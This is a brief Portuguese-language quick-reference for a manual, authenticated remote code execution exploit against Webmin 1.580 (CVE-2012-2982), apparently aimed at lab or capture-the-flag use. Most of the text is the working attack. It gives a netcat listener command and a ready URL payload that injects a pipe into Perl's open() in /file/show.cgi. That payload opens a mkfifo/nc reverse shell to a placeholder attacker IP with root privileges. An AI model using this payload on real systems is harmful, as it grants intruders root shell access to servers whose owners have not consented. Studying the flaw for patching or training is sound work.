
Exploit manual e autenticado de Execução Remota de Código (RCE), sem Metasploit, via barra de URL do navegador para Webmin 1.580 (CVE-2012-2982)
Referência rápida para executar Remote Code Execution (RCE) autenticado no Webmin 1.580 por meio do componente /file/show.cgi.
Execute este comando na sua máquina local para capturar a conexão de entrada antes de executar o payload:
rlwrap nc -lnvp 4444
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Nota: Lembre-se de substituir <YOUR_ATTACK_IP> pelo seu endereço IP local ou de túnel real, TAMBÉM o IP e a PORTA do alvo.

Contexto e Detalhes
open() do Perl em /file/show.cgi. Anexar o caractere pipe (|) permite a execução arbitrária de comandos com privilégios de root.